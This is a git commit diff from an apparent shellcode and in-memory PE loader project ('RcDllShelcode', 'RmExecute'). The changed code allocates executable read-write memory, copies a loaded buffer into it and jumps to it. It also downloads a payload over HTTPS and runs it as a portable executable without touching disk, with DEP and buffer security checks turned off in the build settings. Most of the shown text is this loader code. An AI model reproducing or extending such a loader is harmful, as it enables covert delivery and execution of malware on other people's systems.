修复加载器测试

This commit is contained in:
bakabie 2021-04-09 22:52:46 +08:00
parent 4fa9dd09cb
commit 793daa06d5
11 changed files with 16 additions and 38 deletions

BIN
RUN_EXE_MT/RmExecute.exe Normal file

Binary file not shown.

Binary file not shown.

View File

@ -86,8 +86,12 @@ void RunShellCode()
typedef void(WINAPI* fnFun)(
char*
);
fnFun Shellcode = (fnFun)(filebuf);
PVOID p = NULL;
if ((p = VirtualAlloc(NULL, filelen, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)) == NULL)
MessageBoxA(NULL, "ÉêÇëÄÚ´æʧ°Ü", "ÌáÐÑ", MB_OK);
if (!(memcpy(p, filebuf, filelen)))
MessageBoxA(NULL, "дÄÚ´æʧ°Ü", "ÌáÐÑ", MB_OK);
fnFun Shellcode = (fnFun)p;
Shellcode(URL);
}

View File

@ -1,11 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project>
<ProjectOutputs>
<ProjectOutput>
<FullPath>C:\Users\admin\Desktop\RcDllShelcode\RUN_EXE_MT\RcDllShelcode.exe</FullPath>
</ProjectOutput>
</ProjectOutputs>
<ContentFiles />
<SatelliteDlls />
<NonRecipeFileRefs />
</Project>

View File

@ -1,11 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project>
<ProjectOutputs>
<ProjectOutput>
<FullPath>C:\Users\admin\Desktop\RcDllShelcode\RUN_EXE_MT\RmExecute.exe</FullPath>
</ProjectOutput>
</ProjectOutputs>
<ContentFiles />
<SatelliteDlls />
<NonRecipeFileRefs />
</Project>

View File

@ -167,7 +167,7 @@
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<PreprocessorDefinitions>_DEBUG</PreprocessorDefinitions>
<PreprocessorDefinitions>_CRT_SECURE_NO_WARNINGS;_DEBUG;_CONSOLE;_LIB</PreprocessorDefinitions>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
@ -193,7 +193,7 @@
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='RUN_EXE_MT|x64'">
<Link>
<GenerateDebugInformation>false</GenerateDebugInformation>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Console</SubSystem>
<OptimizeReferences>true</OptimizeReferences>
<DataExecutionPrevention>false</DataExecutionPrevention>
@ -208,7 +208,7 @@
<WarningLevel>Level3</WarningLevel>
<SupportJustMyCode>true</SupportJustMyCode>
<OmitFramePointers>false</OmitFramePointers>
<PreprocessorDefinitions>RUNEXEMT;_CRT_SECURE_NO_WARNINGS</PreprocessorDefinitions>
<PreprocessorDefinitions>RUNEXEMT;_CRT_SECURE_NO_WARNINGS;_DEBUG</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<BufferSecurityCheck>false</BufferSecurityCheck>
</ClCompile>

View File

@ -2,7 +2,7 @@
//加载起始函数,跳转到入口函数
#ifdef _WIN64
VOID mmLoaderSCStart(){
VOID mmLoaderSCStart(){
Strat();
#else
VOID _declspec(naked) mmLoaderSCStart()
@ -27,7 +27,6 @@ public:
Functions fn;
char s_runexe[260];
char* newbuff;
@ -38,8 +37,8 @@ public:
newbuff = NULL;
Initfunctions(&fn);
char runexe[] = { 'A', 'A','\0' };
fn.fnmemcpy(s_runexe, runexe, 260);
};
@ -67,7 +66,7 @@ public:
int size = HttpDownload(host, path, 443, TRUE);
fn.fnMessageBoxA(NULL, newbuff, NULL, MB_OK);
//fn.fnMessageBoxA(NULL, newbuff, NULL, MB_OK);
RunPortableExecutable();

View File

@ -347,7 +347,7 @@ VOID RmExecute::FixImageIAT(PIMAGE_DOS_HEADER dos_header, PIMAGE_NT_HEADERS nt_h
LPVOID iat = (LPVOID)(iat_rva + (UINT_PTR)dos_header);
DWORD op;
fn.fnVirtualProtect(iat, iat_size, PAGE_READWRITE, &op);
__try {
while (import_table->Name) {
import_base = fn.fnLoadLibraryA((LPCSTR)(import_table->Name + (UINT_PTR)dos_header));
fixup = (PIMAGE_THUNK_DATA)(import_table->FirstThunk + (UINT_PTR)dos_header);
@ -375,10 +375,8 @@ VOID RmExecute::FixImageIAT(PIMAGE_DOS_HEADER dos_header, PIMAGE_NT_HEADERS nt_h
}
import_table++;
}
}
__except (1) {
}
return;
}

View File

@ -1 +0,0 @@
213